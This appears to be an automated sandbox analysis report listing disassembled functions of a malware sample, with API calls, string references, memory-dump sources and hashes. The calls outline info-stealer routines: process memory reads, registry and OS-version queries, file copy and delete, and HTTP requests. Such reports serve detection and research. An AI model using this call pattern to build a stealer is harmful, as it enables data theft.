Function 004169A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004169BF
??_U@YAPAXI@Z.MSVCRT ref: 004169ED

Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5

VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
??_V@YAXPAX@Z.MSVCRT ref: 00416B53

Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898

Strings

:lA, xrefs: 00416A18, 00416A1B
@, xrefs: 00416A46

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: :lA$@
API String ID: 2950663791-2855229504
Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9

Function 007E1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007E158E

Part of subcall function 007E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
Part of subcall function 007E1507: RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
Part of subcall function 007E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
Part of subcall function 007E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
Part of subcall function 007E1507: RegCloseKey.ADVAPI32(?), ref: 007E1566

lstrcat.KERNEL32(?,00000000), ref: 007E15B6
lstrlen.KERNEL32(?), ref: 007E15C3
lstrcat.KERNEL32(?,00426284), ref: 007E15DE

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F8867: GetSystemTime.KERNEL32(00420E02,0062CAA4,0042059E,?,?,007E1660,?,0000001A,00420E02,00000000,?,0062C9F0,?,00424EAC,00420DFF), ref: 007F888D

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

CopyFileA.KERNEL32(?,00000000,00000001), ref: 007E16CC

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E9C77: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9CA3
Part of subcall function 007E9C77: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9CC8
Part of subcall function 007E9C77: LocalAlloc.KERNEL32(00000040,?), ref: 007E9CE8
Part of subcall function 007E9C77: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9D11
Part of subcall function 007E9C77: LocalFree.KERNEL32(007E16F6), ref: 007E9D47
Part of subcall function 007E9C77: CloseHandle.KERNEL32(000000FF), ref: 007E9D51

DeleteFileA.KERNEL32(00000000), ref: 007E1756
memset.MSVCRT ref: 007E177D

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID:
API String ID: 3885987321-0
Opcode ID: dd55cf0c3a00f4bc2fbef5f956f936d3611d5badf6379021328398515abbfeac
Instruction ID: 3bb99dc26ed793a3555db5eaff9dc0dba0ab8f6b24486751c5284eccd09b085a
Opcode Fuzzy Hash: dd55cf0c3a00f4bc2fbef5f956f936d3611d5badf6379021328398515abbfeac
Instruction Fuzzy Hash: 1B5142B1D1025CE7CB14FB60DC9AEFD7338AF54300F8041A8B74E62191EE785B89DA96

Function 00417E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

RegQueryValueExA.ADVAPI32(00000000,0087B540,00000000,000F003F,?,00000400), ref: 00417F8C
lstrlenA.KERNEL32(?), ref: 00417FA1
RegQueryValueExA.ADVAPI32(00000000,0087B4E0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B24), ref: 00418039
RegCloseKey.ADVAPI32(00000000), ref: 004180A8
RegCloseKey.ADVAPI32(00000000), ref: 004180BA

Strings

%s\%s, xrefs: 00417EED

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction ID: 0d61fbe7999a289fff57b0559f919f0328d455d47faa6f76a7bc41a93025e826
Opcode Fuzzy Hash: bb939a279c982b77b4b4f8b88d469f26bcfd6aa4ddc14bf67da64128b047d95d
Instruction Fuzzy Hash: 2B211971A0021CABDB24DF54DC85FD9B7B9FB48714F00C199A609A6280DF756AC6CF98

Function 007E4A67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 007E4AA1
??2@YAPAXI@Z.MSVCRT ref: 007E4AB8
??2@YAPAXI@Z.MSVCRT ref: 007E4ACF
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AF0
InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4B00

Strings

<, xrefs: 007E4A80

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 09da3c41dfb9bd363a88ce61bf1dcf0b13143ed6cc738e0ce188ef23801763b1
Instruction ID: 9741f141bf46f9030fd5ccda9e2d6f8564580e810ab45d9aceccb376922e78a7
Opcode Fuzzy Hash: 09da3c41dfb9bd363a88ce61bf1dcf0b13143ed6cc738e0ce188ef23801763b1
Instruction Fuzzy Hash: 9721FCB1D00209ABDF14DFA5EC49AED7B75FF44320F108225F965A7290DB746A05CF91

Function 007F7B07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7B3E
RtlAllocateHeap.NTDLL(00000000), ref: 007F7B45
RegOpenKeyExA.ADVAPI32(80000002,0062C9D4,00000000,00020119,?), ref: 007F7B65
RegQueryValueExA.ADVAPI32(?,0062CCEC,00000000,00000000,000000FF,000000FF), ref: 007F7B86
RegCloseKey.ADVAPI32(?), ref: 007F7B99

Strings

B, xrefs: 007F7B8E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: B
API String ID: 3225020163-2248957098
Opcode ID: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction ID: 120dd7bca5ee2d5e279459bf5c6f4482145a182e4e9fec701916a3adae4bb6b1
Opcode Fuzzy Hash: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction Fuzzy Hash: 951191B1A44609AFD714CF98DC46FBFBB79FB45720F104119F615A7290D7785801CBA1

Function 007F7397 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F73AB
RtlAllocateHeap.NTDLL(00000000), ref: 007F73B2
RegOpenKeyExA.ADVAPI32(80000002,0062CB98,00000000,00020119,00000000), ref: 007F73E4
RegQueryValueExA.ADVAPI32(00000000,0062CC34,00000000,00000000,?,000000FF), ref: 007F7405
RegCloseKey.ADVAPI32(00000000), ref: 007F740F

Strings

Windows 11, xrefs: 007F73C4

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction ID: 9b679efa7f14912591a790eb6469b1be380feaeaaf1ea7b511f24587b0fa9203
Opcode Fuzzy Hash: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction Fuzzy Hash: FB014F75A04608BBEB14DFE0DD49F7D7BB9AB48711F104454BA0597290D7749901CB64

Function 00417130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
HeapAlloc.KERNEL32(00000000), ref: 0041714B
RegOpenKeyExA.ADVAPI32(80000002,008482F8,00000000,00020119,00000000), ref: 0041717D
RegQueryValueExA.ADVAPI32(00000000,0087B558,00000000,00000000,?,000000FF), ref: 0041719E
RegCloseKey.ADVAPI32(00000000), ref: 004171A8

Strings

Windows 11, xrefs: 0041715D

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction ID: 198b37f2a351322ee600fb862932720b373255b2f394089b4190a5419862cb8c
Opcode Fuzzy Hash: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
Instruction Fuzzy Hash: 4C018F74A40208BFEB10DFE4DD49FAE7779EB08710F104098FA0997290D6749A428B64

Function 004171C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004171D4
HeapAlloc.KERNEL32(00000000), ref: 004171DB
RegOpenKeyExA.ADVAPI32(80000002,008482F8,00000000,00020119,00417159), ref: 004171FB
RegQueryValueExA.ADVAPI32(00417159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041721A
RegCloseKey.ADVAPI32(00417159), ref: 00417224

Strings

CurrentBuildNumber, xrefs: 00417211

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction ID: 00cad297c96af00baba5933f046dbcc6cd847f8af16dedc1aa1025fe7f1f3d79
Opcode Fuzzy Hash: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction Fuzzy Hash: EE014FB9A40708BFDB10DFE0DC4AFAEB779EB08704F104558FA05A7291D674AA418B55

Function 007E7577 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75E1
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7658
StrStrA.SHLWAPI(00000000,0042164C,00000000), ref: 007E76B4
GetProcessHeap.KERNEL32(00000000,?), ref: 007E76F9
HeapFree.KERNEL32(00000000), ref: 007E7700

Part of subcall function 007E94F7: vsprintf_s.MSVCRT ref: 007E9512

task.LIBCPMTD ref: 007E77FC

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
String ID:
API String ID: 700816787-0
Opcode ID: 08459276cf32a9fd5a017366a2075bc4a1792fab787612084efadf761c11dad2
Instruction ID: fbfd4f7a86e619c61f42168a95942af57f28438d77e00ece5d0f8628690f555f
Opcode Fuzzy Hash: 08459276cf32a9fd5a017366a2075bc4a1792fab787612084efadf761c11dad2
Instruction Fuzzy Hash: 0D6119B59052A8DBDB24DB50CC45FEDB7B8BF48300F0081E9E689A6141DBB4ABC5CF91

Function 007F5007 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E6537: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 007E6598
Part of subcall function 007E6537: StrCmpCA.SHLWAPI(?,0062CC80), ref: 007E65BA
Part of subcall function 007E6537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E65EC
Part of subcall function 007E6537: HttpOpenRequestA.WININET(00000000,004219CC,?,0062CAB4,00000000,00000000,00400100,00000000), ref: 007E663C
Part of subcall function 007E6537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6676
Part of subcall function 007E6537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6688

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

StrCmpCA.SHLWAPI(00000000,0042106C,00000000), ref: 007F505F
lstrlen.KERNEL32(00000000), ref: 007F5076

Part of subcall function 007F8B37: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8B59

StrStrA.SHLWAPI(00000000,00000000), ref: 007F50AB
lstrlen.KERNEL32(00000000), ref: 007F50CA
strtok.MSVCRT ref: 007F50E5
lstrlen.KERNEL32(00000000), ref: 007F50F5

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID:
API String ID: 3532888709-0
Opcode ID: 13ae85525bac1d6ec9aee36445f9ae95f3b15c81ffb678b318780b1ae27553a8
Instruction ID: fddfa645bfff7c16a98bfb75b4e0a1ebf34fe0cf8f277144d19e0af865fbcd3e
Opcode Fuzzy Hash: 13ae85525bac1d6ec9aee36445f9ae95f3b15c81ffb678b318780b1ae27553a8
Instruction Fuzzy Hash: 2F5101B090028CEBCB18FFA4CD9AEFD7735AF14340F904128FA4956691DB786B05EB56

Function 007F6DD7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 007F6DE5

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

OpenProcess.KERNEL32(001FFFFF,00000000,007F7014,004205AD), ref: 007F6E23
memset.MSVCRT ref: 007F6E71
??_V@YAXPAX@Z.MSVCRT ref: 007F6FC5

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID:
API String ID: 224852652-0
Opcode ID: c5e26cab0dbd8890b37714f58a8ecb94d9b35099d2bba575cc057c98329b0545
Instruction ID: 98ee91ae6c23b0930de12fb089decc5862037258f208ef6fc64208bb4b72c377
Opcode Fuzzy Hash: c5e26cab0dbd8890b37714f58a8ecb94d9b35099d2bba575cc057c98329b0545
Instruction Fuzzy Hash: 7E517FB5D0021DEBDB14EBA4DC49BFDB7B4BF04304F5040A8E31966282DB786A84CF59

Function 007F3E27 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007F3E4C
RegOpenKeyExA.ADVAPI32(80000001,0062CCD8,00000000,00020119,?), ref: 007F3E6B
RegQueryValueExA.ADVAPI32(?,0062C8D4,00000000,00000000,00000000,000000FF), ref: 007F3E8F
RegCloseKey.ADVAPI32(?), ref: 007F3E99
lstrcat.KERNEL32(?,00000000), ref: 007F3EBE
lstrcat.KERNEL32(?,0062C968), ref: 007F3ED2

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 8c8bb549094033170470fae51fd8a3ecc59c7e7698e4a1e541973f02f9c97ac8
Instruction ID: 8806ea3cd40fc556099a756f066e38137a8458dfd60bbedd972f44c271c6b081
Opcode Fuzzy Hash: 8c8bb549094033170470fae51fd8a3ecc59c7e7698e4a1e541973f02f9c97ac8
Instruction Fuzzy Hash: 684152B290010CABDB24FBA0DC4AFEE7739AB4D700F408559B719561C1EA795B898BE1

Function 00413BC0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413BE5
RegOpenKeyExA.ADVAPI32(80000001,0087B8E8,00000000,00020119,?), ref: 00413C04
RegQueryValueExA.ADVAPI32(?,0087C5E0,00000000,00000000,00000000,000000FF), ref: 00413C28
RegCloseKey.ADVAPI32(?), ref: 00413C32
lstrcat.KERNEL32(?,00000000), ref: 00413C57
lstrcat.KERNEL32(?,0087C568), ref: 00413C6B

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: ad7825717976ee9372831f63c4a6a4fd436330d0d215f0c9d25fa14af4724301
Instruction ID: 29de2a712fc1e2dfcbf32ad4341a25eb625067ccdef54b7492a2b75d077fe01c
Opcode Fuzzy Hash: ad7825717976ee9372831f63c4a6a4fd436330d0d215f0c9d25fa14af4724301
Instruction Fuzzy Hash: 1841B8B69001086BDB24EBA0DC46FEE733DAB88304F00895DB619561D1FEB957CC8BD5

Function 00413070 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413098

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

strtok_s.MSVCRT ref: 004131E1

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction ID: 79a306a9ddce9c6cdb539d8aaa48a82ffdeeeca754e5da37ea89086183b8fd1c
Opcode Fuzzy Hash: 0fde3d401e6a36b581a0d6eb60101e268455dd58f6f525be26f0175b483d2959
Instruction Fuzzy Hash: 87416371E01108ABCB04EFE5DC89AEEB774BF44314F00801EE51677251DB78AA95CF9A

Function 0041AD4C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041AD5A

Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041A9A6

DecodePointer.KERNEL32(0042A0D0,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADA7

Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7

DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADCD
DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADE0
DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADEA

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
Instruction ID: 6fffd6e3d1db5a9c5a4b6999176ce23e16b6351fdf67b8a2f65ef9f2441ae444
Opcode Fuzzy Hash: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
Instruction Fuzzy Hash: 663149B09423498FDF109FA9D9442DEBBF1BF48314F14402BD410A6250DBBC48A1CF6A

Function 007F66F7 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CA04), ref: 007F9518
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CDC8), ref: 007F9531
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CE44), ref: 007F9549
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CA64), ref: 007F9561
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CA50), ref: 007F957A
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CAF8), ref: 007F9592
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CCD4), ref: 007F95AA
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CB3C), ref: 007F95C3
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CDA0), ref: 007F95DB
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CD48), ref: 007F95F3
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CBBC), ref: 007F960C
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CAE8), ref: 007F9624
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062CE0C), ref: 007F963C
Part of subcall function 007F94D7: GetProcAddress.KERNEL32(0062D0AC,0062C8B0), ref: 007F9655

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

